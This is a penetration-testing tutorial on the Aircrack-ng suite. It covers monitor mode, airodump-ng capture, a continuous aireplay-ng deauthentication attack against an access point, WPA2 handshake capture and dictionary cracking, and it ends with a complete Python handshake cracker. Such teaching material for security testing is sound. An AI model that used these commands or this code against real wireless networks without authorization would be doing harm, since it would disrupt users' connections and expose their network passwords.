In our Wireless Penetration Testing series, this time we are focusing on a tool that has been around for ages and on which many later wireless attacks and tools were built. Aircrack-ng is not a single tool but a suite of tools, each performing a different type of attack or activity against wireless access points. In this demonstration, we will focus on a few of the tools from the Aircrack-ng arsenal.
Table of Content
· Introduction
· Enabling Monitor Mode
· Sniffing Wireless Packets
· Deauthenticating Users
· Capturing Handshake
· Cracking Password
· Conclusion
Introduction
Aircrack-ng is a package of Wi-Fi network security assessment tools for 802.11 wireless LANs. It includes a network detector, a packet sniffer, a cracker for WEP and WPA/WPA2-PSK keys, and analysis tools. With Aircrack-ng, a penetration tester can cover the monitoring, attacking, testing, and cracking aspects of Wi-Fi security. Monitoring includes packet capturing and exporting the data to files for processing by third-party tools. Attacking includes replay attacks, deauthentication, fake access points (evil twins), and packet injection. Testing covers checking Wi-Fi cards and driver capabilities for capture and injection. Finally, cracking covers recovering WEP keys and WPA/WPA2 pre-shared keys.
Aircrack-ng is supported on Linux, FreeBSD, macOS, OpenBSD, Android, and Windows.
There are a bunch of tools inside the Aircrack-ng suite. In this demonstration, we will be focusing on the following:
airmon-ng: used to enable monitor mode on a Wi-Fi card.
airodump-ng: used for sniffing packets. It writes the captured air traffic to a pcap file and shows information about nearby networks and their clients.
aireplay-ng: used for packet injection attacks, including deauthentication.
aircrack-ng: used for cracking WEP keys using the Fluhrer, Mantin, and Shamir (FMS) attack, the PTW attack, and dictionary attacks, and WPA/WPA2-PSK keys using dictionary attacks.
Note: To perform the attacks in this article, you need a Wi-Fi adapter and driver that support monitor mode and packet injection. Many built-in laptop cards do not, so an external USB adapter is commonly used.
Enabling Monitor Mode
In general terms, monitor mode is an operating mode supported by certain Wi-Fi devices. In monitor mode the card is not associated with any access point; instead of passing up only the frames addressed to it, it passes every 802.11 frame it hears on its current channel (management, control, and data frames from any network) to the operating system. With a suitable driver the card can also transmit raw frames in this mode, which is what aireplay-ng relies on. Monitor is only one of several modes a Wi-Fi interface can operate in (managed, master, ad-hoc, and others). However, in this demonstration, we will be focusing on monitor mode only.
As discussed in the Introduction, airmon-ng is used for enabling monitor mode on Wi-Fi cards. After connecting the external card to our machine, we use airmon-ng to start monitor mode by providing the interface name. In our case the interface in question is wlan0. airmon-ng may warn about processes that could interfere (typically NetworkManager and wpa_supplicant) and list their PIDs; if enabling monitor mode fails, or the card keeps changing channel on its own, kill those processes (by PID, or with airmon-ng check kill) and run the command again. Note that this drops any existing Wi-Fi connection on the machine. Otherwise, the following command puts our Wi-Fi card in monitor mode.
airmon-ng start wlan0
After running airmon-ng, we can confirm that monitor mode is enabled using the iwconfig command. It is a Linux command that can be used to configure a wireless network interface, similar to ifconfig for general interface configuration. After running iwconfig we can see that the interface we used with airmon-ng has, in our case, changed its name from wlan0 to wlan0mon, where the mon suffix indicates monitor mode, and that its Mode field reads Monitor. On newer distributions that no longer ship iwconfig, iw dev shows the same interface with type monitor.
iwconfig
Sniffing Wireless Packets
After placing the Wi-Fi card in monitor mode, we can move on to sniffing wireless packets. As discussed in the Introduction, airodump-ng is used for this activity. To capture a specific access point we need to give airodump-ng its BSSID (MAC address) and channel, so we first run airodump-ng with only the interface, as demonstrated below, to survey the networks in range and gather those details.
airodump-ng wlan0mon
As soon as we start airodump-ng, we will see the list of access points with details such as their BSSID (MAC address), signal strength (PWR), channel (CH), encryption (ENC, e.g. WPA2), cipher (CIPHER) and authentication method (AUTH), and ESSID (the name of the wireless access point), as demonstrated below. The lower half of the screen lists the clients (stations) seen talking to each access point. We will be targeting the wireless access point named "raaj". We can see that it is broadcasting on channel 3 and uses WPA2 with PSK authentication.
Now that we have the BSSID and channel of the access point we want to target, we can restrict the capture to that particular device. We provide the monitor-mode interface, the channel with -c (this locks the card on channel 3 so it does not keep hopping), the BSSID with --bssid, and a file prefix with -w, as demonstrated below. This starts the network capture and writes it to files named pwd-01.cap and so on.
airodump-ng wlan0mon -c 3 --bssid 18:X:X:X:X:X -w pwd
Since we want to crack the password for the targeted access point, we need the WPA 4-way handshake, which is what the attack works on. We will use airodump-ng to capture it. But the handshake is only exchanged when a client authenticates and associates; since all the clients are already connected, no new handshake will occur and we will not be able to capture one. So we send deauthentication frames to the clients so that they are disconnected from the access point; they will then try to reconnect, and at that moment we capture the handshake. Deauthentication frames are unauthenticated management frames, so a client accepts a spoofed one unless the network uses 802.11w (Protected Management Frames). We use aireplay-ng to send them, providing the BSSID of the access point with -a to deauthenticate all connected devices, as demonstrated below (to hit a single client, add -c with its MAC address). The count 0 means send continuously, so stop aireplay-ng with Ctrl+C once the handshake has been captured; only one client needs to reconnect. Make sure to run aireplay-ng in a new terminal and leave airodump-ng running on the same channel so that it can capture the handshake.
aireplay-ng --deauth 0 -a 18:X:X:X:X:X wlan0mon
We go back to the terminal where we started airodump-ng and can see the devices that attempted to reconnect to our targeted access point, and in the top right-hand corner airodump-ng reports WPA handshake followed by the BSSID, meaning it captured the handshake between the access point and one of its clients.
While running airodump-ng we gave pwd as the file prefix under which the capture should be saved. On checking, we see that the handshake has been written to the file named pwd-01.cap. We can now run a dictionary attack against it using aircrack-ng. We need to provide, with -w, a wordlist containing probable passwords.
aircrack-ng pwd-01.cap -w dict.txt
The time aircrack-ng takes depends on your system and the number of entries in the dictionary file: for every candidate passphrase it derives the Pairwise Master Key with PBKDF2 (4096 rounds of HMAC-SHA1 with the ESSID as salt), derives the Pairwise Transient Key from it together with the MAC addresses and nonces from the handshake, and checks whether the resulting MIC matches the one in the captured EAPOL frame. The dictionary we provided had 7 entries, so we were able to crack it in a matter of seconds. On success aircrack-ng prints the Master Key (PMK) and Transient Key (PTK) it computed for the matching passphrase, along with the EAPOL HMAC. The password for the access point was found to be raj12345.
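To make concrete what the last two sections rely on, here is an added example (written for this page, not code from the article or from the Aircrack-ng project) that does in Python what airodump-ng and aircrack-ng do with the handshake: it classifies an EAPOL-Key frame as message 1 to 4 of the 4-way handshake from its Key Information bits, which is how a sniffer knows it has a usable handshake, and then runs a dictionary attack that derives the PMK and PTK for each candidate and compares the MIC. All inputs are constructed for the demo: the SSID "raaj" and passphrase raj12345 come from the article, but the MAC addresses, nonces and the EAPOL frame are made up, since the article's BSSID is masked. It goes slightly beyond the article in also handling the WPA/TKIP descriptor version (HMAC-MD5); the AES-CMAC descriptor version is not covered. Only the Python standard library is used.

```python
import hashlib
import hmac
import struct

# Constructed demo values, not from the article's capture: the article masks its
# BSSID as 18:X:X:X:X:X, so these MAC addresses and nonces are arbitrary placeholders.
SSID, TRUE_PASSPHRASE = b"raaj", b"raj12345"
AP_MAC, STA_MAC = bytes.fromhex("180000000001"), bytes.fromhex("0a0000000002")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))

def pmk_from_passphrase(passphrase, ssid):
    """aircrack-ng's 'Master Key': PBKDF2-HMAC-SHA1, 4096 rounds, ESSID as salt, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)

def prf_512(key, label, data):
    """IEEE 802.11 PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:64]

def derive_ptk(pmk, aa, spa, anonce, snonce):
    """aircrack-ng's 'Transient Key': PTK from the PMK, both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def handshake_message_number(key_info):
    """Which of the four handshake messages an EAPOL-Key frame is, from its Key Info bits."""
    install, ack = key_info & 0x0040, key_info & 0x0080
    mic, secure = key_info & 0x0100, key_info & 0x0200
    if ack and not mic:
        return 1            # AP -> client, carries ANonce
    if mic and not ack and not secure:
        return 2            # client -> AP, carries SNonce and the first MIC
    if ack and mic and install:
        return 3
    if mic and not ack and secure:
        return 4
    return None

def parse_eapol_key(frame):
    """Pull the fields the cracker needs out of a raw EAPOL-Key frame (802.1X header included)."""
    _version, ptype, length = struct.unpack(">BBH", frame[:4])
    if ptype != 3:
        raise ValueError("not an EAPOL-Key frame")
    body = frame[4:4 + length]
    key_info = struct.unpack(">H", body[1:3])[0]
    return {"key_info": key_info, "message": handshake_message_number(key_info),
            "nonce": body[13:45], "mic": body[77:93]}   # MIC sits at offset 81 of the frame

def compute_mic(kck, frame, key_info):
    """aircrack-ng's 'EAPOL HMAC': keyed hash over the frame with its MIC field zeroed."""
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    version = key_info & 0x0007
    if version == 1:                                   # WPA / TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                   # WPA2 / CCMP, as in the article
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("descriptor version 3 (AES-128-CMAC) not handled in this example")

def build_eapol_key_msg2(snonce, mic=b"\x00" * 16):
    """Construct a minimal handshake message 2 (constructed test data, no RSN IE in key data)."""
    key_info = 0x010A   # descriptor version 2, Pairwise, MIC bit set, Ack bit clear
    body = struct.pack(">BHH", 2, key_info, 16)        # RSN descriptor type, key info, key length
    body += (1).to_bytes(8, "big") + snonce            # replay counter, key nonce
    body += b"\x00" * 32 + mic + struct.pack(">H", 0)  # key IV + RSC + ID, MIC, empty key data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # 802.1X v2, type 3 = EAPOL-Key

def make_capture():
    """Stand-in for pwd-01.cap: message 2 whose MIC was computed with the real passphrase."""
    ptk = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = compute_mic(ptk[:16], build_eapol_key_msg2(SNONCE), 0x010A)
    return build_eapol_key_msg2(SNONCE, mic)

def crack(ssid, aa, spa, anonce, msg2_frame, wordlist):
    """What 'aircrack-ng pwd-01.cap -w dict.txt' does for every entry in the wordlist."""
    f = parse_eapol_key(msg2_frame)
    if f["message"] != 2:
        raise ValueError("need message 2 of the 4-way handshake")
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, f["nonce"])[:16]
        if hmac.compare_digest(compute_mic(kck, msg2_frame, f["key_info"]), f["mic"]):
            return candidate
    return None

if __name__ == "__main__":
    wordlist = [b"password", b"12345678", b"raj12345", b"letmein1"]
    print(crack(SSID, AP_MAC, STA_MAC, ANONCE, make_capture(), wordlist))
```

The PBKDF2 step dominates the cost of each guess, which is why the size of the dictionary decides how long aircrack-ng runs and why a long, random passphrase is the only real defence for a PSK network. Note that the attack is entirely offline once pwd-01.cap exists; nothing is sent to the access point while cracking.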
Conclusion
The collection of tools in the Aircrack-ng suite is useful for testing the security of wireless access points. With just four tools, we were able to recover the password required to connect to the targeted access point. Aircrack-ng is one of the oldest tools in the domain, but because WPA2-PSK security rests entirely on the strength of the passphrase, a weak one still falls to it today.